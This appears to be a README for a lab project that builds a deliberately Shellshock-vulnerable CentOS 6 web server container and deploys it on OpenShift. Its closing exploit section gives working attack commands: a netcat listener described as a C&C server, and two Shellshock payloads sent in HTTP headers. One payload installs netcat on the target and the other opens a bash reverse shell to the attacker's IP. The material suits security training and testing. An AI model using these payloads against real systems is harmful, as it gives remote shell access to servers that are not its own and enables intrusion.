You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
1.9 KiB
1.9 KiB
Shellshock vulnerable image
Build
Old CentOS images are here: https://vault.centos.org/
Install it in a virtual machine.
sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso
Mount the qcow2 image as explained here.
sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
sudo mount /dev/mapper/VolGroup-lv_root /mnt/
sudo tar -cvf /tmp/centos6.tar . -C /mnt
sudo umount /mnt
sudo qemu-nbd --disconnect /dev/nbd0
Create the container image.
sudo podman import /tmp/centos6.tar vulnerable-centos:6
sudo buildah bud -t vulnerable-httpd:centos-6 .
Push the image to the registry of your choice.
sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
Usage
sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
Hello, Nicolas!
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
Hello, World!
Deployment
oc apply -f openshift/
Exploit
Find the URL of the vulnerable CGI-BIN.
export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"
Start a C&C server.
sudo firewall-cmd --add-port 6666/tcp
nc -l -p 6666
Set the IP address of the C&C server.
export SERVER_IP=192.168.6.2
Exploit the target.
curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"